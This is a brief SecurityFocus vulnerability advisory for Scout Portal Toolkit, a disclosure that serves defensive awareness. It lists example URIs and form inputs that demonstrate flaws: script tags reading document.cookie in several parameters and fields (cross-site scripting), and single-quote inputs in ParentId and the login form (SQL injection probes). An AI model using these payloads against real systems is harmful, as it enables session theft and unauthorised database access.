Scout Portal Toolkit Multiple Input Validation Vulnerabilities

No exploit is required.

Example URIs have been provided:

http://www.example.com/Projects/SPT/demo/SPT--QuickSearch.php?ss=<script>alert(document.cookie)</script>
http://www.example.com/Projects/SPT/demo/SPT--BrowseResources.php?ParentId=<script>alert(document.cookie)</script>

http://www.example.com/Projects/SPT/demo/SPT--Advanced.php
Input: <script>alert(document.cookie)</script> on all fields..

http://www.example.com/Projects/SPT/demo/SPT--BrowseResources.php?ParentId='

http://www.example.com/Projects/SPT/demo/SPT--UserLogin.php
Input username >> '
Input password >> '


 

Privacy Statement
Copyright 2010, SecurityFocus